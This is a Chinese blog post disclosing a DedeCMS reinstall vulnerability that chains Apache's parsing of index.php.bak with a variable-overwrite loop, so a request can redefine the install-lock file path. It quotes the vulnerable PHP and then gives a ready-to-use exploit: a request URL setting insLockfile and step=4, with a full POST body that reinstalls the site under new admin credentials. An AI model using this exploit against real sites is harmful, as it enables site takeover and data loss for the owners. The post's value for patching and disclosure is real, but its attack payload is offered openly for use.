高危预警：Dedecms通杀重装漏洞利用apache解析+变

发表评论
660 次浏览

A+

显示不全请点击全屏阅读

今天看到红黑有个文章署名作者是SysShell发的一个这个漏洞(不知道是不是原创)，文笔很简洁啊，就给了一个测试的URL，我也很久没写原创文章了，最近一直在写源代码审计系统，预计最迟下周会跟大家见面，目前完成了高精确度自动白盒审计漏洞，代码高亮，漏洞定位，函数/变量列表，代码调试，函数查询，变量/函数追查，自动升级，自定义编辑器，还有很多实用的功能，等出来了大家慢慢玩吧，会首发在www.cnseay.com

进入正题，这个重装漏洞的危害大家应该也知道，我就不多说了，估计又要一批站躺枪了，利用条件是webserver要求是存在apache解析漏洞和install文件夹存在。

利用截图：

Dedecms在安装后会把安装文件/install/index.php备份成/install/index.php.bak，这个在apache下面是会解析成PHP执行的。

看看/install/index.php.bak代码：

$verMsg = ' V5.7 GBKSP1';
$s_lang = 'gb2312';
$dfDbname = 'dedecmsv57gbksp1';
$errmsg = '';
$install_demo_name = 'dedev57demo.txt';
$insLockfile = dirname(__FILE__).'/install_lock.txt';
$moduleCacheFile = dirname(__FILE__).'/modules.tmp.inc';

define('DEDEINC',dirname(__FILE__).'/../include');
define('DEDEDATA',dirname(__FILE__).'/../data');
define('DEDEROOT',preg_replace("#[\\\\\/]install#", '', dirname(__FILE__)));
header("Content-Type: text/html; charset={$s_lang}");

require_once(DEDEROOT.'/install/install.inc.php');
require_once(DEDEINC.'/zip.class.php');

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}

require_once(DEDEINC.'/common.func.php');

if(file_exists($insLockfile))
{
    exit(" 程序已运行安装，如果你确定要重新安装，请先从FTP中删除 install/install_lock.txt！");
}

if(empty($step))
{
    $step = 1;
}

其中$insLockfile = dirname(__FILE__).’/install_lock.txt’;是安装锁文件。在下面的

if(file_exists($insLockfile))
{
    exit(" 程序已运行安装，如果你确定要重新安装，请先从FTP中删除 install/install_lock.txt！");
}

这个代码的意思是：如果$insLockfile这个文件存在，那么就提示已经安装了，如果$insLockfile不存在，那么就可以继续安装，那么我们要控制$insLockfile才能重新安装，

关键的问题在这两段代码中间还有一段dedecms一直很二逼的变量覆盖的代码。

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}

这个是注册变量，如果存在变量就直接覆盖了。

所以我们直接在请求里加上insLockfile=seay就可以把$insLockfile变为seay，当然文件不存在的啦。就重装了。

利用演示：

直接POST数据到这个URL

http://www.cnseay.com/dedecms/install/index.php.bak?insLockfile=1&step=4

就OK了

POST数据：

　　step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&adminuser=admin&adminpwd=admin&cookieencode=JzIVw7439H&webname=%CE%D2%B5%C4%CD%F8%D5%BE&adminmail=admin%40dedecms.com&baseurl=http%3A%2F%2Flocalhost&cmspath=%2Fdedecms

其中的dbhost啥的东西自己改改吧，

提交数据包。效果如下